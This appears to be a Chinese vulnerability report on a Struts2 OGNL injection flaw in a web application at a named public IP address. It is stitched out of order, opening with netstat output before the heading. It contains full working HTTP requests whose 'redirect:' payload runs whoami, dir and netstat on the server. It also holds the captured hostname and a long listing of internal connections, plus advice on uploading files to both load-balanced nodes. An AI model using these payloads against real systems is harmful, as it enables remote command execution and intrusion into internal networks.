  TCP    127.0.0.1:1399         127.0.0.1:1400         ESTABLISHED     5696
  TCP    127.0.0.1:1400         127.0.0.1:1399         ESTABLISHED     5696
  TCP    127.0.0.1:1401         127.0.0.1:1402         ESTABLISHED     5696
  TCP    127.0.0.1:1402         127.0.0.1:1401         ESTABLISHED     5696
  TCP    127.0.0.1:1403         127.0.0.1:1404         ESTABLISHED     5696
  TCP    127.0.0.1:1404         127.0.0.1:1403         ESTABLISHED     5696
  TCP    127.0.0.1:1405         127.0.0.1:1406         ESTABLISHED     5696
  TCP    127.0.0.1:1406         127.0.0.1:1405         ESTABLISHED     5696
  TCP    127.0.0.1:1467         127.0.0.1:1468         ESTABLISHED     6212
  TCP    127.0.0.1:1468         127.0.0.1:1467         ESTABLISHED     6212
  TCP    127.0.0.1:1469         127.0.0.1:1470         ESTABLISHED     6212
  TCP    127.0.0.1:1470         127.0.0.1:1469         ESTABLISHED     6212
  TCP    127.0.0.1:1471         127.0.0.1:1472         ESTABLISHED     6212
  TCP    127.0.0.1:1472         127.0.0.1:1471         ESTABLISHED     6212
  TCP    127.0.0.1:1473         127.0.0.1:1474         ESTABLISHED     6212
  TCP    127.0.0.1:1474         127.0.0.1:1473         ESTABLISHED     6212
  TCP    127.0.0.1:1475         127.0.0.1:1477         ESTABLISHED     6212
  TCP    127.0.0.1:1477         127.0.0.1:1475         ESTABLISHED     6212
  TCP    127.0.0.1:1478         127.0.0.1:1479         ESTABLISHED     6212
  TCP    127.0.0.1:1479         127.0.0.1:1478         ESTABLISHED     6212
  TCP    127.0.0.1:1480         127.0.0.1:1481         ESTABLISHED     6212
  TCP    127.0.0.1:1481         127.0.0.1:1480         ESTABLISHED     6212
  TCP    127.0.0.1:1482         127.0.0.1:1483         ESTABLISHED     6212
  TCP    127.0.0.1:1483         127.0.0.1:1482         ESTABLISHED     6212
  TCP    127.0.0.1:5152         0.0.0.0:0              LISTENING       1248
  TCP    127.0.0.1:8005         0.0.0.0:0              LISTENING       5696
  TCP    127.0.0.1:8065         0.0.0.0:0              LISTENING       5316
  TCP    127.0.0.1:8085         0.0.0.0:0              LISTENING       1748
  TCP    127.0.0.1:8181         0.0.0.0:0              LISTENING       8792
  TCP    127.0.0.1:9005         0.0.0.0:0              LISTENING       6212
  UDP    0.0.0.0:161            *:*                                    1764
  UDP    0.0.0.0:445            *:*                                    4
  UDP    0.0.0.0:500            *:*                                    484
  UDP    0.0.0.0:2425           *:*                                    4680
  UDP    0.0.0.0:4446           *:*                                    5696
  UDP    0.0.0.0:4446           *:*                                    5696
  UDP    0.0.0.0:4446           *:*                                    6212
  UDP    0.0.0.0:4446           *:*                                    6212
  UDP    0.0.0.0:4500           *:*                                    484
  UDP    0.0.0.0:4646           *:*                                    4680
  UDP    0.0.0.0:45564          *:*                                    6212
  UDP    0.0.0.0:45564          *:*                                    5696
  UDP    10.12.66.29:123        *:*                                    812
  UDP    10.12.66.29:137        *:*                                    4
  UDP    10.12.66.29:138        *:*                                    4
  UDP    127.0.0.1:123          *:*                                    812
  UDP    127.0.0.1:1032         *:*                                    2424

影响内网安全

漏洞证明：

ST2这里有一个地方需要突破一下，用工具是不行的。
漏洞地址：http://113.108.100.142/weballiance/cooperateCode!goSearchDemo255_300.action

存在漏洞。
查看下主机名。

POST /weballiance/cooperateCode!goSearchDemo255_300.action?selColor=blue&weballiancecode=L20120515152239892420 HTTP/1.1
User-Agent: Mozilla/5.0 (baidu spider)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 624
Host: 113.108.100.142
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27whoami%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}

ppsc2\shenzhenair

这里有2个负载均衡，也有一些防护设备。上传文件请上传两次才能保证每台上面都有上传文件。

这里工具不能执行dir 命令。因为有\ /的问题，所以要自己去提交。（这个很基础，也很使用，在7.0下面经常会遇到这个问题）代码：

POST /weballiance/cooperateCode!goSearchDemo255_300.action?selColor=blue&weballiancecode=L20120515152239892420 HTTP/1.1
User-Agent: Mozilla/5.0 (baidu spider)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 683
Host: 113.108.100.142
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27cmd.exe /c dir /a /od D:\\apache\\apache-tomcat-7.0.32-A\\webapps%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}

POST /weballiance/cooperateCode!goSearchDemo255_300.action?selColor=blue&weballiancecode=L20120515152239892420 HTTP/1.1
User-Agent: Mozilla/5.0 (baidu spider)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 641
Host: 113.108.100.142
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27cmd.exe /c netstat -ano%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2016 02:39:42 GMT
Server: Apache/2.2.22 (Win32) mod_jk/1.2.37
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
Content-Length: 28721
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       8500
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       724
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING       484
  TCP    0.0.0.0:1029           0.0.0.0:0              LISTENING       1292
  TCP    0.0.0.0:1030           0.0.0.0:0              LISTENING       1292
  TCP    0.0.0.0:1920           0.0.0.0:0              LISTENING       1292
  TCP    0.0.0.0:2425           0.0.0.0:0              LISTENING       4680
  TCP    0.0.0.0:2428           0.0.0.0:0              LISTENING       4680
  TCP    0.0.0.0:2621           0.0.0.0:0              LISTENING       5696
  TCP    0.0.0.0:2625           0.0.0.0:0              LISTENING       5696
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       2104
  TCP    0.0.0.0:3661           0.0.0.0:0              LISTENING       1292
  TCP    0.0.0.0:4026           0.0.0.0:0              LISTENING       6212
  TCP    0.0.0.0:4028           0.0.0.0:0              LISTENING       6212
  TCP    0.0.0.0:5800           0.0.0.0:0              LISTENING       2136
  TCP    0.0.0.0:5900           0.0.0.0:0              LISTENING       2136
  TCP    0.0.0.0:6014           0.0.0.0:0              LISTENING       1292
  TCP    0.0.0.0:6129           0.0.0.0:0              LISTENING       1148
  TCP    0.0.0.0:8009           0.0.0.0:0              LISTENING       5696
  TCP    0.0.0.0:8068           0.0.0.0:0              LISTENING       5316
  TCP    0.0.0.0:8069           0.0.0.0:0              LISTENING       5316
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       5696
  TCP    0.0.0.0:8081           0.0.0.0:0              LISTENING       6212
  TCP    0.0.0.0:8088           0.0.0.0:0              LISTENING       1748
  TCP    0.0.0.0:8089           0.0.0.0:0              LISTENING       1748
  TCP    0.0.0.0:8098           0.0.0.0:0              LISTENING       8792
  TCP    0.0.0.0:8119           0.0.0.0:0              LISTENING       8792
  TCP    0.0.0.0:9009           0.0.0.0:0              LISTENING       6212
  TCP    0.0.0.0:38888          0.0.0.0:0              LISTENING       2044
  TCP    10.12.66.29:80         210.75.21.99:47177     ESTABLISHED     5836
  TCP    10.12.66.29:139        0.0.0.0:0              LISTENING       4
  TCP    10.12.66.29:1044       10.11.108.43:9080      CLOSE_WAIT      1748
  TCP    10.12.66.29:1133       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:1282       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:1289       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:1315       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:1334       59.151.45.134:80       CLOSE_WAIT      1748
  TCP    10.12.66.29:1367       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:1369       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:1407       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1408       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1409       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1410       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1411       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1412       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1413       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1414       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1415       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1416       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1417       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1418       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1419       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1420       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1421       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1422       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1423       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1424       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1425       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1426       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1427       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1428       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1429       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1430       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1431       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1432       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1433       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1434       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1435       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1436       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1437       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1438       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1439       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1440       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1441       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1442       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1443       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1444       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1445       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1446       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1447       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1448       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1449       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1450       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1451       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1452       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1453       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1454       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1455       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1456       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1457       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1458       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1459       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1460       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1461       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1462       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1463       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1464       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1465       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1466       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1484       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1485       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1486       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1487       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1488       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1489       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1490       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1491       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1492       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1493       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1494       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1495       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1496       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1497       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1498       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1499       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1500       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1501       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1502       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1503       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1504       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1505       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1506       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1507       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1508       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1509       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1510       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1511       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1512       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1513       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1514       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1515       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1516       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1517       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1518       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1519       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1520       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1521       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1522       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1523       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1524       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1525       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1526       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1527       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1528       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1529       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1530       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1531       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1532       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1533       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1534       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1535       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1536       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1537       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1538       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1539       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1540       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1541       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1542       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1543       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1577       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:1578       59.151.44.157:80       CLOSE_WAIT      8792
  TCP    10.12.66.29:1615       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1616       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1617       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1618       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1619       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1626       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:1677       10.11.102.107:9001     CLOSE_WAIT      6212
  TCP    10.12.66.29:1702       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:1703       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:1705       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:1706       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:1727       10.11.103.83:9081      CLOSE_WAIT      8792
  TCP    10.12.66.29:1792       59.151.45.134:80       CLOSE_WAIT      1748
  TCP    10.12.66.29:1815       10.110.10.71:8014      ESTABLISHED     2424
  TCP    10.12.66.29:1822       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1823       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1824       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1825       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1830       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:1836       10.11.108.43:9080      CLOSE_WAIT      1748
  TCP    10.12.66.29:1837       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:1838       59.151.45.134:80       ESTABLISHED     1748
  TCP    10.12.66.29:1840       61.155.159.101:80      TIME_WAIT       0
  TCP    10.12.66.29:1841       61.155.159.101:80      TIME_WAIT       0
  TCP    10.12.66.29:1842       140.206.211.15:443     TIME_WAIT       0
  TCP    10.12.66.29:1843       140.206.211.15:443     TIME_WAIT       0
  TCP    10.12.66.29:1844       140.206.211.15:443     TIME_WAIT       0
  TCP    10.12.66.29:1845       10.11.108.43:9080      CLOSE_WAIT      5316
  TCP    10.12.66.29:1846       140.206.211.15:443     TIME_WAIT       0
  TCP    10.12.66.29:1847       120.132.34.101:80      CLOSE_WAIT      8792
  TCP    10.12.66.29:1848       63.88.100.162:80       CLOSE_WAIT      2728
  TCP    10.12.66.29:1849       10.11.108.43:9080      CLOSE_WAIT      8792
  TCP    10.12.66.29:1850       61.155.159.101:80      TIME_WAIT       0
  TCP    10.12.66.29:1852       61.155.159.101:80      TIME_WAIT       0
  TCP    10.12.66.29:1853       10.12.66.29:4028       TIME_WAIT       0
  TCP    10.12.66.29:1854       10.12.66.113:139       TIME_WAIT       0
  TCP    10.12.66.29:1855       10.12.66.113:139       TIME_WAIT       0
  TCP    10.12.66.29:1856       10.12.66.29:4028       TIME_WAIT       0
  TCP    10.12.66.29:1857       10.12.66.28:4083       TIME_WAIT       0
  TCP    10.12.66.29:1858       10.12.66.28:4150       TIME_WAIT       0
  TCP    10.12.66.29:1859       10.12.66.31:4045       TIME_WAIT       0
  TCP    10.12.66.29:1860       10.12.66.31:3755       TIME_WAIT       0
  TCP    10.12.66.29:1861       10.12.66.29:2625       TIME_WAIT       0
  TCP    10.12.66.29:1862       61.155.159.101:80      TIME_WAIT       0
  TCP    10.12.66.29:1863       103.37.152.53:80       ESTABLISHED     5316
  TCP    10.12.66.29:1864       10.11.103.83:9081      ESTABLISHED     1748
  TCP    10.12.66.29:1900       92.123.143.249:80      CLOSE_WAIT      3808
  TCP    10.12.66.29:2334       63.110.60.17:80        CLOSE_WAIT      9436
  TCP    10.12.66.29:2621       10.12.66.28:2199       ESTABLISHED     5696
  TCP    10.12.66.29:2621       10.12.66.28:2200       ESTABLISHED     5696
  TCP    10.12.66.29:2621       10.12.66.29:4051       ESTABLISHED     5696
  TCP    10.12.66.29:2621       10.12.66.31:8304       ESTABLISHED     5696
  TCP    10.12.66.29:2621       10.12.66.31:8305       ESTABLISHED     5696
  TCP    10.12.66.29:2621       10.12.66.31:8306       ESTABLISHED     5696
  TCP    10.12.66.29:2621       10.12.66.31:8307       ESTABLISHED     5696
  TCP    10.12.66.29:2629       96.7.54.97:80          CLOSE_WAIT      9160
  TCP    10.12.66.29:2632       10.12.66.31:3761       ESTABLISHED     5696
  TCP    10.12.66.29:2636       10.12.66.31:3753       ESTABLISHED     5696
  TCP    10.12.66.29:2638       10.12.66.31:4051       ESTABLISHED     5696
  TCP    10.12.66.29:2640       10.12.66.28:4148       ESTABLISHED     5696
  TCP    10.12.66.29:2642       10.12.66.28:4081       ESTABLISHED     5696
  TCP    10.12.66.29:2644       10.12.66.31:4043       ESTABLISHED     5696
  TCP    10.12.66.29:2780       10.12.65.51:6014       ESTABLISHED     1292
  TCP    10.12.66.29:3031       59.151.45.134:80       CLOSE_WAIT      1748
  TCP    10.12.66.29:3225       10.12.65.60:1918       ESTABLISHED     1292
  TCP    10.12.66.29:3282       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:3586       120.132.34.101:80      CLOSE_WAIT      8792
  TCP    10.12.66.29:3653       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:3669       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:3676       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:3677       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:3712       59.151.45.134:80       CLOSE_WAIT      1748
  TCP    10.12.66.29:3722       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:3771       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:3817       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:3822       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:3945       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:3970       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:3990       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:4011       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:4026       10.12.66.28:2613       ESTABLISHED     6212
  TCP    10.12.66.29:4026       10.12.66.28:2614       ESTABLISHED     6212
  TCP    10.12.66.29:4026       10.12.66.29:4032       ESTABLISHED     6212
  TCP    10.12.66.29:4026       10.12.66.31:11191      ESTABLISHED     6212
  TCP    10.12.66.29:4026       10.12.66.31:11192      ESTABLISHED     6212
  TCP    10.12.66.29:4026       10.12.66.31:11193      ESTABLISHED     6212
  TCP    10.12.66.29:4026       10.12.66.31:11194      ESTABLISHED     6212
  TCP    10.12.66.29:4032       10.12.66.29:4026       ESTABLISHED     5696
  TCP    10.12.66.29:4034       10.12.66.31:3761       ESTABLISHED     6212
  TCP    10.12.66.29:4036       10.12.66.31:3753       ESTABLISHED     6212
  TCP    10.12.66.29:4038       10.12.66.31:4051       ESTABLISHED     6212
  TCP    10.12.66.29:4042       10.12.66.28:4081       ESTABLISHED     6212
  TCP    10.12.66.29:4045       10.12.66.28:4148       ESTABLISHED     6212
  TCP    10.12.66.29:4049       10.12.66.31:4043       ESTABLISHED     6212
  TCP    10.12.66.29:4051       10.12.66.29:2621       ESTABLISHED     6212
  TCP    10.12.66.29:4060       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:4110       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:4239       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:4327       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:4415       59.151.45.134:80       CLOSE_WAIT      1748
  TCP    10.12.66.29:4416       59.151.45.134:80       CLOSE_WAIT      1748
  TCP    10.12.66.29:4503       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:4533       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:4661       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:4736       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:4737       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:4761       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:4763       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:4794       10.11.103.83:9081      CLOSE_WAIT      1748
  TCP    10.12.66.29:4803       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:4813       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:4920       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:4950       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:4957       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:4966       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:5002       0.0.0.0:0              LISTENING       5696
  TCP    10.12.66.29:5003       0.0.0.0:0              LISTENING       6212
  TCP    10.12.66.29:8009       10.12.66.29:1615       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1616       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1617       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1618       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1619       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1822       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1823       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1824       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1825       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:4661       ESTABLISHED     5696
  TCP    10.12.66.29:8088       10.11.102.104:4121     TIME_WAIT       0
  TCP    10.12.66.29:8088       10.11.102.104:4150     TIME_WAIT       0
  TCP    10.12.66.29:8088       10.11.102.104:4157     FIN_WAIT_2      1748
  TCP    10.12.66.29:8088       10.11.102.104:4219     FIN_WAIT_2      1748
  TCP    10.12.66.29:8088       10.11.102.104:4246     ESTABLISHED     1748
  TCP    10.12.66.29:8088       10.11.102.104:4248     ESTABLISHED     1748
  TCP    10.12.66.29:8088       10.12.67.28:3276       FIN_WAIT_2      1748
